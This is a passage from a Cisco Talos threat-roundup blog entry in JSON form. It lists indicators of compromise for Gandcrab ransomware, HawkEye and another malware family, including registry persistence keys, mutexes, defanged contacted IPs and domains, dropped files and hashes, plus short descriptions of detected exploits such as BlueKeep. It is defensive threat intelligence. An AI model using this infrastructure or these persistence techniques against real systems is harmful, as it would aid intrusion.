\n`100[.]127[.]143[.]246` | 18 \n`100[.]109[.]114[.]19` | 18 \n`100[.]79[.]213[.]246` | 18 \n`100[.]67[.]20[.]29` | 18 \n`150[.]95[.]16[.]71` | 12 \n`113[.]61[.]76[.]239` | 12 \n`111[.]125[.]71[.]22` | 12 \n`80[.]11[.]158[.]65` | 10 \n`173[.]255[.]214[.]126` | 6 \n`169[.]254[.]255[.]255` | 2 \n`74[.]202[.]142[.]71` | 2 \n`96[.]126[.]121[.]64` | 2 \n`77[.]90[.]136[.]129` | 2 \n`69[.]28[.]91[.]207` | 1 \n`200[.]38[.]35[.]102` | 1 \n`96[.]127[.]149[.]2` | 1 \n`107[.]190[.]137[.]130` | 1 \n`191[.]252[.]112[.]194/31` | 1 \n`200[.]58[.]123[.]102` | 1 \n`98[.]142[.]107[.]242` | 1 \n`138[.]128[.]170[.]234` | 1 \n`65[.]99[.]252[.]200` | 1 \n`190[.]8[.]176[.]37` | 1 \n`67[.]217[.]34[.]70` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`hontam[.]net` | 30 \n`powayhomevalues[.]com` | 18 \n`gongxu[.]gfbags[.]com` | 18 \n`sabrespringshomevalues[.]com` | 18 \n`1localexpert[.]com` | 18 \n`smtpout[.]secureserver[.]net` | 2 \n`smtp[.]prodigy[.]net[.]mx` | 2 \n`mxa[.]web-hostingmx[.]com` | 1 \n`mail[.]prosyde[.]com` | 1 \n`mail[.]ledneonchile[.]cl` | 1 \n`mail[.]vieracruz[.]com` | 1 \n`bestsol[.]pe` | 1 \n`mailserver[.]dtctty[.]com` | 1 \n`mail[.]alcorsa[.]com[.]gt` | 1 \n`mail[.]imelsa[.]cl` | 1 \n`mail[.]jacto[.]com[.]ar` | 1 \n`lucanodotaciones[.]com` | 1 \n`mail[.]adevpa[.]com` | 1 \n`smtp[.]hidroil[.]com[.]ar` | 1 \n`mail[.]mpcsa[.]com[.]mx` | 1 \n`mail[.]amadisa[.]com` | 1 \n`mail[.]confirmeza[.]com[.]co` | 1 \n`mail[.]inmediprest[.]com[.]mx` | 1 \n`mail[.]nueratelecom[.]net` | 1 \n`mail[.]insurcol[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\223.exe` | 30 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 10 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-LanguagePackSetup%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-NcdAutoSetup%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx` | 2 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-TZSync%4Operational.evtx` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\5f7b5f1e01b83767.automaticDestinations-ms` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\a4a5324453625195.automaticDestinations-ms` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\f01b4d95cf55d32a.automaticDestinations-ms` | 2 \n`\\TDLN-2060-41` | 2 \n`%LOCALAPPDATA%\\TileDataLayer\\Database\\EDB.log` | 2 \n`\\Device\\NamedPipe\\Sessions\\1\\AppContainerNamedObjects\\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.IE5` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat` | 2 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCookies` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\TEMP.lnk` | 2 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\Word.Document.8` | 1 \n`%TEMP%\\CVRB4F.tmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 08214f8f4d27bc90013b2403d515dadfe992e48b104fd2748ae28b4e37c2ddd6 1bf23d80114b94336235bc3b83960f4bcecd4478effa98b92536c1e907bb70b8 26485f44831ed89fabdf3773fd36709e78b560139836a17d784ee84493e6f021 3324b01c88474616fd9701d13708f6c9ff2d2125ed14e7983ae72ea1c5a5edf2 33b3b2a6c822fa356cc251c03b4e25f5a082a126a6d10717a312436250d6682e 3528140e6db34bde7280f4284122fb7190a4606ac61a4030f91504e4a962cb93 38589a48cab122fb15dc5efa82ae023b8b467a99e60c3c183772dc3d58bd43c5 4e1659700f1d599197f6bbe2330e7c91d87578fe23bfe082dce719f6e5372e0c 4f9954159f29d6292d48986cd0ab71952357c48738dda7f59798c66241514ae9 549fa8564e7e677601d557509c9f44336cc07a8c92949cd4928017ade6c072f4 660c09d1e5ae736de0b1fea0ee93040d0240567fe7254953cd8644bb0b2e49f6 664166554198691ddfb441ac33b12f12e5d14e36b0fb5c09d35ee04bd6d68ca2 6661a70c61b67a87302e04706ff07bcb12328d74bf1d8c7c0075d3edeb8064dc 765ba4ac4d0a2d99916dc9b0e844a669c4b5c5217068741c66216d9b291cea10 899e4dff369309ab4c7c5a466dbcf642bce9788307a75efe8371cc1087714eaf 9c1d3857fa6c1dfee066d46f1ce467429e26d020036019b57e9e87aa2f8fc2ab a2717826ba6ed1d778ef8d7585ddae5c1e076da3d9cfaa9c5c8247c3c4f33ccb aa33bd6b5ac85cb8d3a4d7e511b8c513ad22f7e6b130a456e23a2d07aa89304a b35cf729a7cbf201c9b3682441e6edf65031fee775412e9887c751c1add6d3b3 b48575d226d564c2fb7235f4962d1b29e6152dcdab262157bed79c2a02f11157 c894fbda9027f90b827efebd981c2326d8761e843e5e633990bdc756240087e7 d03bed2bf79256ad1c94c6c66570e35ab54943ba921bdf295c2d0c5d12e7e982 d4b9a89ae01db11a9adf508ed1777327145eb205404a1df5020919c19068d4e0 e5c52d8f0bbb10dff3dcb0c7d055fdc5d856e8e9b2805a1560681f383c679b72 e80c5f3eeb9d4cea62abe90a95e27b1c04ee7b02bf021e11cf9da956485c0bea `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-sOfzBR2RcLs/Xf0GFO2qaTI/AAAAAAAADEE/4tvJstRSx4sB2bMIpTujkvu0ZW5dVPRJQCLcBGAsYHQ/s1600/e80c5f3eeb9d4cea62abe90a95e27b1c04ee7b02bf021e11cf9da956485c0bea_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-FVtOXQoimEA/Xf0GJx72BkI/AAAAAAAADEI/TCXd3CRSo-woM6thdkimZ-72l4c0xh3HQCLcBGAsYHQ/s1600/d4b9a89ae01db11a9adf508ed1777327145eb205404a1df5020919c19068d4e0_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ajOIztn97Ug/Xf0GP0kDCtI/AAAAAAAADEM/FU_HSIrmu8YJ7arCQncWhst1u9d72eICgCLcBGAsYHQ/s1600/1bf23d80114b94336235bc3b83960f4bcecd4478effa98b92536c1e907bb70b8_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/--fW-Vz116hE/Xf0GUGd93vI/AAAAAAAADEQ/aTLPYJ7Rw54aKbsJA_hvmM2ZQC2jmK5dACLcBGAsYHQ/s1600/e80c5f3eeb9d4cea62abe90a95e27b1c04ee7b02bf021e11cf9da956485c0bea_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Gandcrab-7454521-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 22 \n`<HKCU>\\SOFTWARE\\KEYS_DATA ` | 22 \n`<HKCU>\\SOFTWARE\\KEYS_DATA\\DATA ` | 22 \n`<HKCU>\\SOFTWARE\\KEYS_DATA\\DATA \nValue Name: public ` | 22 \n`<HKCU>\\SOFTWARE\\KEYS_DATA\\DATA \nValue Name: private ` | 22 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\D1EB23A46D17D68FD92564C2F1F1601764D8E349 \nValue Name: Blob ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\system32\\rundll32.exe ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: Impersonate ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: Asynchronous ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: MaxWait ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: DllName ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: Startup ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: frostdm ` | 2 \n`<HKCU>\\Software\\Microsoft\\<random, matching '[A-Z][a-z]{3,11}'> ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: webappsstore.exe ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bookmarks-2017-10-03.exe ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IRIF \nValue Name: Pyursy ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KUWY \nValue Name: Naember ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\8B5BAAB9E36E4507C5F5.lock` | 22 \n`A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A` | 10 \n`A9ZLO3DAFRVH1WAE` | 2 \n`AhY93G7iia` | 2 \n`B81XZCHO7OLPA` | 2 \n`BSKLZ1RVAUON` | 2 \n`F-DAH77-LLP` | 2 \n`FURLENTG3a` | 2 \n`FstCNMutex` | 2 \n`GJLAAZGJI156R` | 2 \n`I-103-139-900557` | 2 \n`J8OSEXAZLIYSQ8J` | 2 \n`LXCV0IMGIXS0RTA1` | 2 \n`MKS8IUMZ13NOZ` | 2 \n`OLZTR-AFHK11` | 2 \n`OPLXSDF19WRQ` | 2 \n`PLAX7FASCI8AMNA` | 2 \n`RGT70AXCNUUD3` | 2 \n`TEKL1AFHJ3` | 2 \n`TXA19EQZP13A6JTR` | 2 \n`VSHBZL6SWAG0C` | 2 \n`chimvietnong` | 2 \n`drofyunfdou` | 2 \n`kliaduosix` | 2 \n`limdouxdaz` | 2 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`93[.]125[.]99[.]121` | 22 \n`185[.]135[.]88[.]105` | 22 \n`146[.]66[.]72[.]87` | 22 \n`87[.]236[.]16[.]31` | 22 \n`217[.]160[.]0[.]234` | 22 \n`69[.]73[.]180[.]151` | 22 \n`171[.]244[.]34[.]167` | 22 \n`217[.]174[.]149[.]130` | 22 \n`178[.]238[.]37[.]162` | 22 \n`179[.]188[.]11[.]34` | 22 \n`89[.]252[.]187[.]72` | 22 \n`77[.]104[.]144[.]25` | 22 \n`202[.]43[.]45[.]181` | 22 \n`217[.]160[.]0[.]27` | 22 \n`92[.]53[.]96[.]201` | 22 \n`213[.]186[.]33[.]3` | 22 \n`50[.]87[.]58[.]165` | 22 \n`77[.]104[.]171[.]238` | 22 \n`194[.]154[.]192[.]67` | 22 \n`204[.]11[.]56[.]48` | 22 \n`23[.]236[.]62[.]147` | 22 \n`213[.]186[.]33[.]5` | 22 \n`217[.]70[.]184[.]50` | 22 \n`52[.]58[.]78[.]16` | 22 \n`66[.]96[.]147[.]103` | 22 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`big-game-fishing-croatia[.]hr` | 22 \n`www[.]lagouttedelixir[.]com` | 22 \n`www[.]himmerlandgolf[.]dk` | 22 \n`zaeba[.]co[.]uk` | 22 \n`bellytobabyphotographyseattle[.]com` | 22 \n`www[.]wash-wear[.]com` | 22 \n`www[.]poketeg[.]com` | 22 \n`boatshowradio[.]com` | 22 \n`www[.]perfectfunnelblueprint[.]com` | 22 \n`perovaphoto[.]ru` | 22 \n`www[.]cakav[.]hu` | 22 \n`goodapd[.]website` | 22 \n`www[.]ismcrossconnect[.]com` | 22 \n`www[.]fabbfoundation[.]gm` | 22 \n`alem[.]be` | 22 \n`cevent[.]net` | 22 \n`mauricionacif[.]com` | 22 \n`cyclevegas[.]com` | 22 \n`oceanlinen[.]com` | 22 \n`6chen[.]cn` | 22 \n`koloritplus[.]ru` | 22 \n`asl-company[.]ru` | 22 \n`www[.]krishnagrp[.]com` | 22 \n`test[.]theveeview[.]com` | 22 \n`picusglancus[.]pl` | 22 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\ntuser.ini` | 22 \n`%APPDATA%\\Microsoft\\Media Player\\KRAB-DECRYPT.txt` | 22 \n`%HOMEPATH%\\AppData\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Media Center Programs\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Credentials\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\SmartArt Graphics\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\Document Themes\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\Document Themes\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\SmartArt Graphics\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\Word Document Building Blocks\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\Word Document Building Blocks\\KRAB-DECRYPT.txt` | 22 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0682b36ae0be779eb1ad4d3e0d8958a08ad8e044609a6cee5af314ed4d94f237 0c7d85f6f2e1e16ca7bef272edffdb0d513ce0f050347578600cdac206e048bd 1483d05311d9c544e404bf3b35e1bc80a154dd9b5d9757a24b99569cc5ddf680 17133d42590782a30f8464c7446d6a202299daf3cf8391ea40883d17e9d367ed 17ef571b3e2bbbb215ebfb291a1a4c17169a7a5ff0720718720eadacd4500830 1d69bee79a17d872422f9aada2d4b4ee4c048a8932ef50885c9d327cf225af4c 20cf2009ca1e7155b428ae8c76ab0baf7196aaa4c0d2bb7b9aa452a595d4a3ac 2135b77151f05d56f91a8c652edaf6b7a28ae26300b1550b5d28672131aee95e 245efbc6f214ff0d5726c671b51ba0569edf83666c557152b54c494821bc0a7f 2481c8679ec7110d1811fd1578862b9f1b7439c1d818bd4102ebe31cb7e706c7 27b4c02d76cf9845056d456244cd093d86880101f4f6971323814a5eabc7e7b0 292ba930f72bbfa23dab563c3f35ec157a0374b8b3f34f122c6a5997a3daa81b 318cff626b73c4508e9860b2d9ad8a5b53f93637a9a4b9b21cec27c0dde10dcf 37bf027ea0235e19e6d72597c45721c99b9ec619982f7d948e8ddfa2742ef6ae 39eb43c190b49a55de56873a0947d32177bb183791d1f696ff102f75c9b1dca2 3debcef78d8f77548491144e69fde1d89f7b5392b09b1b51f4df061aa622c706 420fe4c2431f23d3a7c4044cdcb71d434daded7c127da6fd1a150c322dcde5e4 670cba74908e2755ace9382cbbd26016fa4c66d7794958fe2d51530100aaaa2a 6a6bc4b3e2c460141981ba83a3a933e35adddc4814a3ffca8e329a5c63a149b8 708bf234cb01321625bf94fd58ece8719ce405b0f0895c59b9a1634b532b6307 73aeb522487874825cbe13567a86280273f90b8a4ee2367f758f393fc24a406e 77b0e7632645006d4a456b314a1899c6c0aba73dcaf74cdbe91bf946c7c9ea98 7a8a1c55a55adfea28a36ef6b6c4836990d62dfb941dfe3ba68e6c32fe7d9874 7dd4779ce5a53500c292236d9b9b062c99cec62ef118aae15a752362fd4e0358 87182baddbc7e1915abd036980c7554a7ee4f7281055772fd851ce67284a6616 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-EqM5h1pjJHw/Xf0GzaDIFDI/AAAAAAAADEg/vsToWCMYlgA2x6545gawfH4VRjtFtrlvgCLcBGAsYHQ/s1600/318cff626b73c4508e9860b2d9ad8a5b53f93637a9a4b9b21cec27c0dde10dcf_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pAIKH3uRpx0/Xf0G3NA_exI/AAAAAAAADEk/Lz5VGq8eQtU44jwFyHU8l2h8LbQrbAvwACLcBGAsYHQ/s1600/f7d7c3c2f18131b432af6b8cfa03bebbbce9e1fe914cef79f4464ab4dda1baad_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-2_OrUR0VFSA/Xf0G85OlwaI/AAAAAAAADEo/ZKVdId7_TMonOi-VQdzTDEY66dqP-7xYQCLcBGAsYHQ/s1600/17133d42590782a30f8464c7446d6a202299daf3cf8391ea40883d17e9d367ed_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.HawkEye-7455512-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Update ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Registry Key Name ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 6 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]16[.]155[.]36` | 5 \n`82[.]221[.]130[.]149` | 3 \n`104[.]16[.]154[.]36` | 3 \n`208[.]91[.]198[.]143` | 2 \n`204[.]11[.]56[.]48` | 1 \n`23[.]94[.]43[.]90` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`whatismyipaddress[.]com` | 8 \n`www[.]macniica[.]com` | 4 \n`smtp[.]vivaldi[.]net` | 3 \n`us2[.]smtp[.]mailhostbox[.]com` | 2 \n`smtp[.]believelogs[.]com` | 2 \n`www[.]swift-be[.]com` | 1 \n`smtp[.]umcship-tw[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\pid.txt` | 8 \n`%APPDATA%\\pidloc.txt` | 8 \n`%TEMP%\\holdermail.txt` | 8 \n`%TEMP%\\holderwb.txt` | 8 \n`%TEMP%\\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp` | 8 \n`%APPDATA%\\D282E1` | 6 \n`%APPDATA%\\D282E1\\1E80C5.lck` | 6 \n`%APPDATA%\\WindowsUpdate.exe` | 6 \n`%TEMP%\\subfolder` | 1 \n`%TEMP%\\subfolder\\filename.exe` | 1 \n`%TEMP%\\subfolder\\filename.vbs` | 1 \n \n#### File Hashes\n\n` 1cb99e6bb3f83d21bc06877531beb9bc652e311a5e49747062bbef5c5501cc70 2701a8daf4384bd6842ef6bb2bfc4c0418b204dfce07ef69b251a2c5de593e01 4688f2885e00eea958abbc479e875708c6e9f2347cb9ef5af4e8881c9b3b8439 525dae4004eed37854b1a6ce2046280a3c1d14f9d79c34447a6bf297d3313dca 6ac5e9684bd5bad7070d674da4786eee6827f5d88bd076aa0dc7f7d734d666e3 7036562647bece05ea15c2b3bea5ab4b40c3a965a5272d3a24dcb7af8930d8a5 75f3b9c29533c3b67b040a211d9acc2860ce3f224200d5985b69319210478fb4 7d494230588aedf9bb8700105b6c5cf2383efa5dda79daa3752f9f13b92dad2c a306d0e9ba34a447d09b932a9ab125406872672212534e9aeb3a9d81338ff4d0 af7ff1a7242dbd0d142c03bfe23fd84f24b5dce494cca6545a6409548ae09c9e c24a1e52447710a56f0e1de99401197fd2abebaa15c18de7aa0fa9548d7b15c5 c79783e0d3330fc51bcc92714e8663234c7443ad9245046a5072685c9fa6a86f ceec143cb503f31efadadc2ca82cb74d52b08566ddde6bcba26da248d0fadb20 e52e3ffeb93c7794f2631ee2d9ac0dace29c1be8b4e0723db344879b23e9cfe4 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-0lOO8svNQCc/Xf0HNsu1BVI/AAAAAAAADE0/cEnYTdm-GvYd497LTV26dCFzGfN1gyLAQCLcBGAsYHQ/s1600/c79783e0d3330fc51bcc92714e8663234c7443ad9245046a5072685c9fa6a86f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-zVXfjiXuTtI/Xf0HSvMiBxI/AAAAAAAADE4/0Len_QlrcxIhiuvcxj1rljBRIaKkPcWngCLcBGAsYHQ/s1600/c24a1e52447710a56f0e1de99401197fd2abebaa15c18de7aa0fa9548d7b15c5_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-e66AbVVWUzg/Xf0HZb0n9NI/AAAAAAAADE8/y_aUoYiSo8oFBSFte64rbW8HUVoatJ9SQCLcBGAsYHQ/s1600/75f3b9c29533c3b67b040a211d9acc2860ce3f224200d5985b69319210478fb4_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (24210) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (295) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (161) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (143) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (112) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (98) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nExcessively long PowerShell command detected \\- (89) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nSpecial Search Offer adware \\- (45) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. \nReverse http payload detected \\- (26) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (25) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "cvss3": {}, "published": "2019-12-20T10:07:43", "type": "talosblog", "title": "Threat Roundup for December 13 to December 20", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-12-20T10:07:43", "id": "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/gN121cJK8cQ/threat-roundup-1213-1220.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-14T21:31:51", "description": 